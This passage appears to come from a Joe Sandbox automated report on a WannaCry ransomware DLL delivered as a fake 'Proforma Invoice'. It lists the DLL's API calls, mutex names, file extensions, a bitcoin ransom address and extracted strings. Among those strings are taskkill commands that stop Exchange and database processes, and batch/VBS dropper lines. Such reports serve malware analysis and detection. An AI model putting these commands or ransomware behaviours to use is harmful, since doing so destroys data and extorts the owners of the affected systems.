                                                            • Opcode Fuzzy Hash: bf392daa0d3de960360cd3c4300729d8e512d5ebde27cbd7410bd1becd215d1f
                                                            • Instruction Fuzzy Hash: 1F319F7154430AAAF720DB64CC84FEBB3A9FBD8780F004928F74897194E675A54987B7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 10004087
                                                            • GlobalAlloc.KERNEL32(00000000,00000008), ref: 1000409E
                                                            • _local_unwind2.MSVCRT ref: 100040D0
                                                            • CreateFileA.KERNELBASE(10003B63,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10004101
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000008,?,00000000), ref: 10004122
                                                            • _local_unwind2.MSVCRT ref: 10004132
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File_local_unwind2$AllocCreateCryptExportGlobalWrite
                                                            • String ID:
                                                            • API String ID: 3505601379-0
                                                            • Opcode ID: e4b24a4896234405ddc3ddca99fc1a5403f2d49dbf9026041e1240e4559407fe
                                                            • Instruction ID: f2e4c173d5c66980f3caf99a3bd82662d3c6a30a16efd476d92b7f0e9405a5ca
                                                            • Opcode Fuzzy Hash: e4b24a4896234405ddc3ddca99fc1a5403f2d49dbf9026041e1240e4559407fe
                                                            • Instruction Fuzzy Hash: 4E3150B1D10225ABE720CB948C45FEFB7BCFB49BA0F200759FA25B21C4E775690487A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
                                                            • _local_unwind2.MSVCRT ref: 10004017
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$CreateSize_local_unwind2
                                                            • String ID:
                                                            • API String ID: 1039228802-0
                                                            • Opcode ID: a418ad88937dbf3f3f2f90a93e697cbecaf6d1334aa3d5b8eb2f9d90e99da0df
                                                            • Instruction ID: e4fcb762b0a2cf85546a5226953a162905cdc9c51df010501401105139b3880b
                                                            • Opcode Fuzzy Hash: a418ad88937dbf3f3f2f90a93e697cbecaf6d1334aa3d5b8eb2f9d90e99da0df
                                                            • Instruction Fuzzy Hash: C23150B1D04219ABEB10CF988C84FBFB7BCF7487A0F104729FA28A22D4E73558018764
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CryptExportKey.ADVAPI32(?,00000000,?,00000000,?,?,00000008,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041AD
                                                            • CryptGetKeyParam.ADVAPI32(?,00000008,?,?,00000000,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041DF
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            Similarity
                                                            • API ID: Crypt$ExportParam
                                                            • String ID:
                                                            • API String ID: 2541419234-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 10003A80: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,75AA3310,75AA3310,10003D9E,?,75AA3310,00000000), ref: 10003A9D
                                                            • CryptImportKey.ADVAPI32(?,1000D054,00000114,?,?,00000008,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003AF9
                                                              • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BBB
                                                              • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BD0
                                                              • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BE7
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            Similarity
                                                            • API ID: Crypt$ContextDestroy$AcquireImportRelease
                                                            • String ID:
                                                            • API String ID: 3621138593-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • time.MSVCRT ref: 100047AA
                                                              • Part of subcall function 10004730: CreateFileA.KERNELBASE(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000,00000000,?,10005A09), ref: 10004749
                                                            • Sleep.KERNELBASE(000003E8), ref: 100047C9
                                                            • ExitThread.KERNEL32 ref: 100047DC
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateExitFileSleepThreadtime
                                                            • String ID:
                                                            • API String ID: 2783800087-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BBB
                                                            • CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BD0
                                                            • CryptReleaseContext.ADVAPI32(?,00000000,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BE7
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            Similarity
                                                            • API ID: Crypt$Destroy$ContextRelease
                                                            • String ID:
                                                            • API String ID: 1308222791-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,75AA3310,75AA3310,10003D9E,?,75AA3310,00000000), ref: 10003A9D
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            Similarity
                                                            • API ID: AcquireContextCrypt
                                                            • String ID:
                                                            • API String ID: 3951991833-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CryptDestroyKey.ADVAPI32(?,?,00000000,10003B1E,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003C0F
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            Similarity
                                                            • API ID: CryptDestroy
                                                            • String ID:
                                                            • API String ID: 1712904745-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CryptGenKey.ADVAPI32(?,00000001,08000001,?,10003B4D,?,00000008), ref: 10004361
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            Similarity
                                                            • API ID: Crypt
                                                            • String ID:
                                                            • API String ID: 993010335-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph of the function at 10005ae0; legend: Executed / Not Executed. Graph not reproduced.]
                                                            APIs
                                                              • Part of subcall function 10004690: CreateMutexA.KERNELBASE(00000000,00000001,MsWinZonesCacheCounterMutexA,?,10005B11), ref: 1000469A
                                                              • Part of subcall function 10004690: GetLastError.KERNEL32(?,10005B11), ref: 100046A6
                                                              • Part of subcall function 10004690: CloseHandle.KERNEL32(00000000,?,10005B11), ref: 100046B4
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000103), ref: 10005B45
                                                            • wcsrchr.MSVCRT ref: 10005B58
                                                            • wcsrchr.MSVCRT ref: 10005B68
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 10005B75
                                                            • sprintf.MSVCRT ref: 10005BBA
                                                            • sprintf.MSVCRT ref: 10005BCA
                                                            • sprintf.MSVCRT ref: 10005BDA
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 10005C00
                                                            • DeleteFileA.KERNELBASE(00000000.res,00000000.pky,00000000.eky), ref: 10005C66
                                                            • CreateThread.KERNELBASE(00000000,00000000,10004790,00000000,00000000,00000000), ref: 10005CAE
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,1000DC68,00000008), ref: 10005CBB
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005CC5
                                                            • CreateThread.KERNELBASE(00000000,00000000,100045C0,00000000,00000000,00000000), ref: 10005CD1
                                                            • CloseHandle.KERNEL32(00000000,?,1000DC68,00000008), ref: 10005CD8
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005CDC
                                                            • CreateThread.KERNELBASE(00000000,00000000,10005730,00000000,00000000,00000000), ref: 10005CE8
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005CEE
                                                            • CreateThread.KERNELBASE(00000000,00000000,10005300,00000000,00000000,00000000), ref: 10005CFF
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,1000DC68,00000008), ref: 10005D06
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005D0A
                                                            • CreateThread.KERNELBASE(00000000,00000000,10004990,00000000,00000000,00000000), ref: 10005D1B
                                                            • CloseHandle.KERNEL32(00000000,?,1000DC68,00000008), ref: 10005D22
                                                            • Sleep.KERNELBASE(00000064,?,1000DC68,00000008), ref: 10005D26
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,1000DC68,00000008), ref: 10005D34
                                                            • CloseHandle.KERNEL32(00000000,?,1000DC68,00000008), ref: 10005D3B
                                                            • CreateThread.KERNEL32(00000000,00000000,10004990,00000000,00000000,00000000), ref: 10005D4C
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10005D57
                                                            • CloseHandle.KERNEL32(00000000), ref: 10005D5E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseCreate$Thread$HandleSleep$sprintf$ChangeFileFindNotificationObjectSingleWaitwcsrchr$??2@CurrentDeleteDirectoryErrorLastModuleMutexName
                                                            • String ID: %08X.eky$%08X.pky$%08X.res$00000000.eky$00000000.pky$00000000.res
                                                            • API String ID: 559266157-2804955549
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph of the function at 100057c0; legend: Executed / Not Executed. Graph not reproduced.]
                                                            APIs
                                                              • Part of subcall function 10001590: ??2@YAPAXI@Z.MSVCRT ref: 100015FC
                                                            • GetFileAttributesA.KERNELBASE(f.wnry,00000000.pky,10005340,1000DD8C,75AA0F10), ref: 10005819
                                                            • time.MSVCRT ref: 1000583D
                                                            • sprintf.MSVCRT ref: 1000585F
                                                            • InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100058C1
                                                            • GetLogicalDrives.KERNELBASE ref: 1000591C
                                                            • GetDriveTypeW.KERNELBASE(?), ref: 10005964
                                                            • GetDriveTypeW.KERNELBASE(?), ref: 10005977
                                                            • InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100059A4
                                                            • sprintf.MSVCRT ref: 100059DD
                                                            • time.MSVCRT ref: 100059F6
                                                            • sprintf.MSVCRT ref: 10005A1F
                                                            • GetDriveTypeW.KERNEL32(?), ref: 10005A7D
                                                            • Sleep.KERNEL32(0000EA60), ref: 10005A98
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: DriveTypesprintf$ExchangeInterlockedtime$??2@AttributesDrivesFileLogicalSleep
                                                            • String ID: :\$%s co$%s fi$00000000.pky$@WanaDecryptor@.exe$cmd.exe /c start /b %s vs$f.wnry$taskkill.exe /f /im MSExchange*$taskkill.exe /f /im Microsoft.Exchange.*$taskkill.exe /f /im mysqld.exe$taskkill.exe /f /im sqlserver.exe$taskkill.exe /f /im sqlwriter.exe
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph 300 omitted; first block 100029f0-100029fe]
                                                            APIs
                                                            • Sleep.KERNELBASE(000003E8,?,?,?,?,100029E9), ref: 10002A17
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,100029E9), ref: 10002A36
                                                            • wcslen.MSVCRT ref: 10002A69
                                                            • MoveFileExW.KERNELBASE(702D6090,?,00000001), ref: 10002A7A
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 10002A85
                                                            • GetFileAttributesW.KERNEL32(?), ref: 10002A91
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 10002A9B
                                                            • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 10002AA5
                                                            • swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 10002ACD
                                                            • MoveFileExW.KERNELBASE(702D6090,?,00000001), ref: 10002ADA
                                                            • DeleteFileW.KERNELBASE(702D6090), ref: 10002AE5
                                                            • GetFileAttributesW.KERNELBASE(702D6090), ref: 10002AF0
                                                            • SetFileAttributesW.KERNELBASE(702D6090,00000000), ref: 10002AFA
                                                            • MoveFileExW.KERNELBASE(702D6090,00000000,00000004), ref: 10002B04
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002B3E
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002B50
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100029E9), ref: 10002B76
                                                            • ExitThread.KERNEL32 ref: 10002B89
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$Move$??3@CriticalSection$DeleteEnterExitLeaveSleepThreadswprintfwcslen
                                                            • String ID: %s\%d%s$.WNCRYT
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: sprintf$fclose$AttributesFile_ftol_wfopenfopenfreadfwrite
                                                            • String ID: $%d worth of bitcoin$%.1f BTC$12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw$@Please_Read_Me@.txt$@WanaDecryptor@.exe$r.wnry
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph 373 omitted; first block 10003010-1000302e]
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,7598A390,?,?,10002BEC,?,?,?,10006E59,000000FF,100022E7,?), ref: 10003025
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 10003044
                                                            • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 10003059
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$Create
                                                            • String ID: UUUU
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph 440 omitted; first block 10004cd0-10004ce7]
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(@WanaDecryptor@.exe,00000000), ref: 10004CE2
                                                            • CopyFileA.KERNEL32(u.wnry,@WanaDecryptor@.exe,00000000), ref: 10004CF5
                                                            • GetFileAttributesW.KERNELBASE(@WanaDecryptor@.exe.lnk), ref: 10004D00
                                                            • GetCurrentDirectoryA.KERNEL32(00000208,?,75AA0F00), ref: 10004D45
                                                            • sprintf.MSVCRT ref: 10004DC2
                                                            Strings
                                                            • @WanaDecryptor@.exe.lnk, xrefs: 10004DAC
                                                            • @WanaDecryptor@.exe, xrefs: 10004CEB, 10004DA2
                                                            • @WanaDecryptor@.exe, xrefs: 10004CDD
                                                            • @echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs, xrefs: 10004D11
                                                            • @WanaDecryptor@.exe.lnk, xrefs: 10004CFB
                                                            • u.wnry, xrefs: 10004CF0
                                                            • \, xrefs: 10004D67
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CopyCurrentDirectorysprintf
                                                            • String ID: @WanaDecryptor@.exe$@WanaDecryptor@.exe$@WanaDecryptor@.exe.lnk$@WanaDecryptor@.exe.lnk$@echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs$\$u.wnry
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Filewcscpy$AttributesDelete_wcsicmpswprintfwcscatwcsrchr
                                                            • String ID: %s%s$.WNCRY$.WNCYR
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            • %sdel /a %%0, xrefs: 100011A0
                                                            • @echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs, xrefs: 10001146
                                                            • %d%d.bat, xrefs: 1000116B
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CountTickfclosefopenfprintfrandsprintfsrandtime
                                                            • String ID: %d%d.bat$%sdel /a %%0$@echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph 471 omitted; first block 10004890-1000489e]
                                                            APIs
                                                              • Part of subcall function 10001360: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,7598F130), ref: 1000139C
                                                            • GetFullPathNameA.KERNEL32(@WanaDecryptor@.exe,00000208,?,00000000), ref: 100048D3
                                                            • sprintf.MSVCRT ref: 100048F0
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,@WanaDecryptor@.exe,00000000,00000000,00000000), ref: 1000495F
                                                            • CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,@WanaDecryptor@.exe,00000000), ref: 10004975
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,@WanaDecryptor@.exe,00000000,00000000), ref: 1000497C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$AllocateCreateFullInitializeNamePathProcesssprintf
                                                            • String ID: %s %s$@WanaDecryptor@.exe$D$taskse.exe
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OpenMutexA.KERNEL32(00100000,00000001,Global\MsWinZonesCacheCounterMutexW), ref: 10004610
                                                            • CloseHandle.KERNEL32(00000000), ref: 1000461B
                                                            • sprintf.MSVCRT ref: 1000463F
                                                            • CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 10004651
                                                            • GetLastError.KERNEL32 ref: 1000465D
                                                            • CloseHandle.KERNEL32(00000000), ref: 1000466B
                                                            Strings
                                                            • %s%d, xrefs: 10004639
                                                            • Global\MsWinZonesCacheCounterMutexW, xrefs: 10004604
                                                            • Global\MsWinZonesCacheCounterMutexA, xrefs: 10004634
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleMutex$CreateErrorLastOpensprintf
                                                            • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA$Global\MsWinZonesCacheCounterMutexW
                                                            • API String ID: 1504150273-3969049628
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcslen.MSVCRT ref: 10002BD9
                                                            • EnterCriticalSection.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002BFA
                                                            • wcslen.MSVCRT ref: 10002C15
                                                            • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 10002C23
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 10002C57
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10002CB8
                                                              • Part of subcall function 10003010: GetFileAttributesW.KERNELBASE(?,7598A390,?,?,10002BEC,?,?,?,10006E59,000000FF,100022E7,?), ref: 10003025
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002CD6
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10002CE3
                                                            • wcslen.MSVCRT ref: 10002D04
                                                            • DeleteFileW.KERNELBASE(?,?,10006E59,000000FF,100022E7,?), ref: 10002D12
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
